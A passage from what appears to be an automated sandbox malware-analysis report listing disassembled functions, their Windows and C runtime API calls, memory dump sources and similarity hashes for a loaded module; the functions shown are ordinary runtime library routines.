                                                                                                          • API ID: _errno_invalid_parameter_noinfo_towlower_l$iswctype
                                                                                                          • String ID:
                                                                                                          • API String ID: 3991495309-0
                                                                                                          • Opcode ID: 98420dca378b99487839370542b656027110283adde92e4ce886822a32d93de7
                                                                                                          • Instruction ID: da2c601462f2c14c6bd025e7110d635c2e26e29daf06077dd57e5d7a112c4ea0
                                                                                                          • Opcode Fuzzy Hash: 98420dca378b99487839370542b656027110283adde92e4ce886822a32d93de7
                                                                                                          • Instruction Fuzzy Hash: 6F3133B2800365DBDBA18BACC8807BE77A4BF02639F240246F4709B2D8DB74F941C764
                                                                                                          Function 6FDD3E2A Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(6FDD3F38,0000000C), ref: 6FDD3E49
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDD3F38,0000000C), ref: 6FDD3E54
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _lock_file.MSVCR100(?,6FDD3F38,0000000C), ref: 6FDD3E71
                                                                                                          • _fileno.MSVCR100(?,?,?,6FDD3F38,0000000C), ref: 6FDD3E81
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,?,?,6FDD3F38,0000000C), ref: 6FDD3EDB
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,?,?,6FDD3F38,0000000C), ref: 6FDD3EE6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo$_fileno_invalid_parameter_lock_file
                                                                                                          • String ID:
                                                                                                          • API String ID: 1742103896-0
                                                                                                          • Opcode ID: ae54701a07a340012af92e16280c385a6a5d705ed4c29c1099e6fbec229a306d
                                                                                                          • Instruction ID: 4f754b913ff11ddd556d7b5149d5f3a46dbbc6c2ba911694c5030bc89596fc3b
                                                                                                          • Opcode Fuzzy Hash: ae54701a07a340012af92e16280c385a6a5d705ed4c29c1099e6fbec229a306d
                                                                                                          • Instruction Fuzzy Hash: E221C971901349DBDB909FB49C8667E3BB16F82338F15832AF435DA1D0DB39B9428B61
                                                                                                          Function 6FD8FFA2 Relevance: 9.1, APIs: 6, Instructions: 81COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _tolower_l.MSVCR100(00000000,00000000,00000000,0000009E,7FFFFFFF,00000000), ref: 6FD8FFFE
                                                                                                          • _tolower_l.MSVCR100(00000000,00000000,00000000,00000000,00000000,0000009E,7FFFFFFF,00000000), ref: 6FD9000D
                                                                                                          • _errno.MSVCR100(00000000,0000009E,7FFFFFFF,00000000), ref: 6FDAC401
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000000,0000009E,7FFFFFFF,00000000), ref: 6FDAC40C
                                                                                                          • _errno.MSVCR100(00000000,0000009E,7FFFFFFF,00000000), ref: 6FDAC428
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000000,0000009E,7FFFFFFF,00000000), ref: 6FDAC433
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo_tolower_l
                                                                                                          • String ID:
                                                                                                          • API String ID: 2295542030-0
                                                                                                          • Opcode ID: 22bab6cea23179d034cf18225b7db1b7e667aa7ca00d2ce77c223c303067afcc
                                                                                                          • Instruction ID: 3b69ec05224e32fc80d08208ffeab2e9eeeefa6495536380fbe946953fb9a09f
                                                                                                          • Opcode Fuzzy Hash: 22bab6cea23179d034cf18225b7db1b7e667aa7ca00d2ce77c223c303067afcc
                                                                                                          • Instruction Fuzzy Hash: 3021A031900349EFDFA29FB8D808BBE37A4AF012A9F24079AA4745B1D4DB71F941D761
                                                                                                          Function 6FDF6B37 Relevance: 9.1, APIs: 6, Instructions: 80memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(6FDF6C58,0000002C), ref: 6FDF6B57
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDF6C58,0000002C), ref: 6FDF6B62
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • HeapWalk.KERNEL32(?,6FDF6C58,0000002C), ref: 6FDF6B8B
                                                                                                          • HeapValidate.KERNEL32(00000000,00000000,6FDF6C58,0000002C), ref: 6FDF6BAC
                                                                                                          • HeapWalk.KERNEL32(?,?,?,?,?,?,?,6FDF6C58,0000002C), ref: 6FDF6BD3
                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,6FDF6C58,0000002C), ref: 6FDF6C16
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Walk$ErrorLastValidate_errno_invalid_parameter_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 4251274765-0
                                                                                                          • Opcode ID: f15e93c560464fb586a89b7d67de4bb149e42c56f073374923e042d67a553449
                                                                                                          • Instruction ID: a6b7cac33c6b64ccef1a5eaf512205671eb851ccd70dee61a4e5f07ed8afd5de
                                                                                                          • Opcode Fuzzy Hash: f15e93c560464fb586a89b7d67de4bb149e42c56f073374923e042d67a553449
                                                                                                          • Instruction Fuzzy Hash: 08319C3091624AEEDF40DFA4D945F9EBBF4BF03324F11422AE460EA590E738B941CB10
                                                                                                          Function 6FDD4132 Relevance: 9.1, APIs: 6, Instructions: 75COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(6FDD4230,0000000C,6FDD4267,6FDEB723,?,?,00000000,?), ref: 6FDD4151
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDD4230,0000000C,6FDD4267,6FDEB723,?,?,00000000,?), ref: 6FDD415C
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _lock_file.MSVCR100(?,6FDD4230,0000000C,6FDD4267,6FDEB723,?,?,00000000,?), ref: 6FDD4176
                                                                                                          • _fileno.MSVCR100(?,6FDD4230,0000000C,6FDD4267,6FDEB723,?,?,00000000,?), ref: 6FDD4186
                                                                                                          • _errno.MSVCR100(6FDD4230,0000000C,6FDD4267,6FDEB723,?,?,00000000,?), ref: 6FDD41E0
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDD4230,0000000C,6FDD4267,6FDEB723,?,?,00000000,?), ref: 6FDD41EB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo$_fileno_invalid_parameter_lock_file
                                                                                                          • String ID:
                                                                                                          • API String ID: 1742103896-0
                                                                                                          • Opcode ID: 8fde853a6b5518d91032e576a78afc8fe541364565f3337d7ddc6ebfde910718
                                                                                                          • Instruction ID: d2f95ebc66b677cac1bc4e0a39a30d1cf510e44978c113cd9dcae810b5cb52cc
                                                                                                          • Opcode Fuzzy Hash: 8fde853a6b5518d91032e576a78afc8fe541364565f3337d7ddc6ebfde910718
                                                                                                          • Instruction Fuzzy Hash: 8621B072801709CADB849FB89C056AE3AB0BF93338F254716F8759A1D0EB38B5528B51
                                                                                                          Function 6FDBEFB6 Relevance: 9.1, APIs: 6, Instructions: 73synchronizationCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetTickCount.KERNEL32 ref: 6FDBEFCD
                                                                                                          • WaitForSingleObject.KERNEL32(?,00000064), ref: 6FDBEFED
                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6FDBEFF9
                                                                                                          • GetTickCount.KERNEL32 ref: 6FDBF02B
                                                                                                          • GetTickCount.KERNEL32 ref: 6FDBF035
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 6FDBF081
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CountTick$CriticalSection$EnterLeaveObjectSingleWait
                                                                                                          • String ID:
                                                                                                          • API String ID: 2379733562-0
                                                                                                          • Opcode ID: 6405145d20f92a4e21a650c5e695496017b71cbc35a5abe40a6cb27a30e7219c
                                                                                                          • Instruction ID: d9e0ea82cc8225ec187a0db6f7ceef0dbb0f5d02b247594d07aff3bb1a824cc6
                                                                                                          • Opcode Fuzzy Hash: 6405145d20f92a4e21a650c5e695496017b71cbc35a5abe40a6cb27a30e7219c
                                                                                                          • Instruction Fuzzy Hash: 7221ACB5900315CBDF408FA8C8967AD7BB1EF45311F20066AE9529E1E4C7B1B940DB61
                                                                                                          Function 6FD8CD78 Relevance: 9.1, APIs: 6, Instructions: 73COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _fileno.MSVCR100(?,?,?,?,?,6FD93129,?), ref: 6FD8CDC5
                                                                                                          • _read.MSVCR100(00000000,?,?,?,?,6FD93129,?), ref: 6FD8CDCC
                                                                                                          • _fileno.MSVCR100(?), ref: 6FD8CDEF
                                                                                                          • _fileno.MSVCR100(?), ref: 6FD8CDFF
                                                                                                          • _fileno.MSVCR100(?), ref: 6FD8CE10
                                                                                                          • _fileno.MSVCR100(?,?), ref: 6FD8CE20
                                                                                                          • _errno.MSVCR100(?,?,6FD93129,?), ref: 6FDA870C
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,6FD93129,?), ref: 6FDA8717
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _fileno$_errno_invalid_parameter_noinfo_read
                                                                                                          • String ID:
                                                                                                          • API String ID: 2022966298-0
                                                                                                          • Opcode ID: 85019651125287c0cb4ec6fd3f5a2240869d484e07b847bb0820dab6c0c69098
                                                                                                          • Instruction ID: ca509ff68e55676dab33b6eab7569e04b2548f75bc0bda2357889ad35cbbe9c0
                                                                                                          • Opcode Fuzzy Hash: 85019651125287c0cb4ec6fd3f5a2240869d484e07b847bb0820dab6c0c69098
                                                                                                          • Instruction Fuzzy Hash: 03110F32004B00EED7611F7AC804AEAB7A4AF423287204B1EE8FD9B1E1D731F142CB94
                                                                                                          Function 6FDF0EE5 Relevance: 9.1, APIs: 6, Instructions: 72COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?,00000000,?,00000000,00000000,00000005), ref: 6FDF0F00
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,00000000,?,00000000,00000000,00000005), ref: 6FDF0F0B
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100(00000000,?,00000000,?,00000000,00000000,00000005), ref: 6FDF0F2B
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000000,?,00000000,?,00000000,00000000,00000005), ref: 6FDF0F36
                                                                                                          • _tolower_l.MSVCR100(?,?,0000009C,00000000,?,00000000,?,00000000,00000000,00000005), ref: 6FDF0F6F
                                                                                                          • _tolower_l.MSVCR100(00000000,?,?,?,0000009C,00000000,?,00000000,?,00000000,00000000,00000005), ref: 6FDF0F7E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo_tolower_l$_invalid_parameter
                                                                                                          • String ID:
                                                                                                          • API String ID: 2286559371-0
                                                                                                          • Opcode ID: a3422df7cbbdd4be7845bb07d6381f1531ff4a97f63f7ee7bf0ef5c50e9f9ebe
                                                                                                          • Instruction ID: 125a110085b85ad13695c2531f3845b50d156ea7548ca90628c4160bf77c8272
                                                                                                          • Opcode Fuzzy Hash: a3422df7cbbdd4be7845bb07d6381f1531ff4a97f63f7ee7bf0ef5c50e9f9ebe
                                                                                                          • Instruction Fuzzy Hash: 5D21B07190A349DFDB919BA8C848EAE3BA4AF413B4F221389A4705B1D5DB70B902C760
                                                                                                          Function 6FDD3FFE Relevance: 9.1, APIs: 6, Instructions: 70COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(6FDD40D0,0000000C,6FDD410A,00000000,?,?,?,00000040), ref: 6FDD401A
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDD40D0,0000000C,6FDD410A,00000000,?,?,?,00000040), ref: 6FDD4024
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100(6FDD40D0,0000000C,6FDD410A,00000000,?,?,?,00000040), ref: 6FDD405B
                                                                                                          • _errno.MSVCR100 ref: 6FDD4066
                                                                                                          • _lock_file.MSVCR100(?,6FDD40D0,0000000C,6FDD410A,00000000,?,?,?,00000040), ref: 6FDD4077
                                                                                                            • Part of subcall function 6FD8A48D: _lock.MSVCR100(?,?,?,6FDD6E10,00000040,6FDD6E48,0000000C,6FDA8676,00000000,?), ref: 6FD8A4BA
                                                                                                          • _fclose_nolock.MSVCR100(?,6FDD40D0,0000000C,6FDD410A,00000000,?,?,?,00000040), ref: 6FDD4087
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_fclose_nolock_invalid_parameter_invalid_parameter_noinfo_lock_lock_file
                                                                                                          • String ID:
                                                                                                          • API String ID: 1408780765-0
                                                                                                          • Opcode ID: 03bb64485b8bb94c69657cdc739564f3e32494ca1810ad882b07793568656020
                                                                                                          • Instruction ID: 9e6f77cda8caef7534f06d267d1293c3101c3089e8c07650cf270c3cb6a7e1a7
                                                                                                          • Opcode Fuzzy Hash: 03bb64485b8bb94c69657cdc739564f3e32494ca1810ad882b07793568656020
                                                                                                          • Instruction Fuzzy Hash: 9121AF71501346DFDB90AFA888815AE7BE0BF06328B15C93DF069DB1D0C734B891EBA0
                                                                                                          Function 6FDC9E75 Relevance: 9.1, APIs: 6, Instructions: 68synchronizationsleepCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,6FDC9E6A), ref: 6FDC9E8A
                                                                                                          • GetTickCount.KERNEL32 ref: 6FDC9EAA
                                                                                                          • Sleep.KERNEL32(00000000), ref: 6FDC9EC0
                                                                                                          • InterlockedPushEntrySList.KERNEL32(?,-00000008), ref: 6FDC9EF7
                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6FDC9F20
                                                                                                          • CloseHandle.KERNEL32(?), ref: 6FDC9F3B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ObjectSingleWait$CloseCountEntryHandleInterlockedListPushSleepTick
                                                                                                          • String ID:
                                                                                                          • API String ID: 1290815868-0
                                                                                                          • Opcode ID: f6facac711a1ae8bf98d43d6f22ae1a5a7f79b18fb1f2e7ffe7af455920ed3af
                                                                                                          • Instruction ID: 3ae3af3c89829aba62389eab10ac511eb268f68448354d6bfdc551d8574f26ed
                                                                                                          • Opcode Fuzzy Hash: f6facac711a1ae8bf98d43d6f22ae1a5a7f79b18fb1f2e7ffe7af455920ed3af
                                                                                                          • Instruction Fuzzy Hash: 3821D572704712EBEB468B74CCC87DABBACFB51329F140325E52587684CB357851CB92
                                                                                                          Function 6FDC697F Relevance: 9.1, APIs: 6, Instructions: 67COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • InitializeSListHead.KERNEL32(?,00000010,6FDC6D69,00000000,?), ref: 6FDC69A4
                                                                                                          • GetLastError.KERNEL32 ref: 6FDC69D7
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000), ref: 6FDC69EF
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20C48,00000000), ref: 6FDC69FD
                                                                                                          • GetLastError.KERNEL32 ref: 6FDC6A17
                                                                                                          • ??2@YAPAXI@Z.MSVCR100(00000030), ref: 6FDC6A25
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$??0scheduler_resource_allocation_error@??2@Concurrency@@ExceptionHeadInitializeListThrow
                                                                                                          • String ID:
                                                                                                          • API String ID: 955234677-0
                                                                                                          • Opcode ID: 321211812e7819599e4f80c4029d7c8bbb5b76f1ce54c23cbdcb3bb9f668d558
                                                                                                          • Instruction ID: e4a5e205aa8320caf0e6d4bf8d874e9aa5d66388e76238a76d0a3c01b4c50999
                                                                                                          • Opcode Fuzzy Hash: 321211812e7819599e4f80c4029d7c8bbb5b76f1ce54c23cbdcb3bb9f668d558
                                                                                                          • Instruction Fuzzy Hash: 36215B75504706DFD781DF68C851AAE7BF8AF0A764B108529E459DB280EB34FA01CB62
                                                                                                          Function 6FDB8ACC Relevance: 9.1, APIs: 6, Instructions: 65threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6FDB62E7: ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,6FDB8AE8,?,000000FF), ref: 6FDB6365
                                                                                                            • Part of subcall function 6FDB62E7: memset.MSVCR100(00000000,00000000,?,00000000,6FDB8AE8,?,000000FF), ref: 6FDB6377
                                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,000000FF,00000001,00000010,6FDC0C24,00000000,00000000,00000000,?,?,00000000,6FE1FF1C), ref: 6FDB8B03
                                                                                                          • GetLastError.KERNEL32(?,?,00000000,6FE1FF1C,000000FF,?,6FDC0AE8,?,?,?,00000000), ref: 6FDB8B13
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000,?,?,00000000,6FE1FF1C,000000FF,?,6FDC0AE8,?,?,?,00000000), ref: 6FDB8B2B
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20C48,00000000,?,?,00000000,6FE1FF1C,000000FF,?,6FDC0AE8,?,?,?,00000000), ref: 6FDB8B39
                                                                                                          • ??2@YAPAXI@Z.MSVCR100(0000001C,00000000,?,?,00000000,6FE1FF1C,000000FF,?,6FDC0AE8,?,?,?,00000000), ref: 6FDB8B4B
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6FDB8B80
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??0scheduler_resource_allocation_error@??2@Concurrency@@CreateCurrentErrorEventExceptionLastThreadThrowmemset
                                                                                                          • String ID:
                                                                                                          • API String ID: 1678402346-0
                                                                                                          • Opcode ID: 001caff6e3948b1f3318960a16799b8c07faa8089113fbdfb377ef7e2c2b39eb
                                                                                                          • Instruction ID: a20f60684db36eb31ab2a59f955c6d5d7edc896064985f0188e2499b31e48b6f
                                                                                                          • Opcode Fuzzy Hash: 001caff6e3948b1f3318960a16799b8c07faa8089113fbdfb377ef7e2c2b39eb
                                                                                                          • Instruction Fuzzy Hash: 71219DF1804356EFD7809F758884A5EBBA4FF05314B64856DE12ACB280C734F852DBA4
                                                                                                          Function 6FDF66D4 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDF66E4
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDF66EF
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100 ref: 6FDF6707
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDF6712
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                          • String ID:
                                                                                                          • API String ID: 1328987296-0
                                                                                                          • Opcode ID: 325b19103732be2bf192ff6ece39d334575eded0025389ecec622df15bb6abf7
                                                                                                          • Instruction ID: 4a385890f99d0f4786b34e4dfb8b09a7d50ffaf997d4c519f09fa92ecd3bb4be
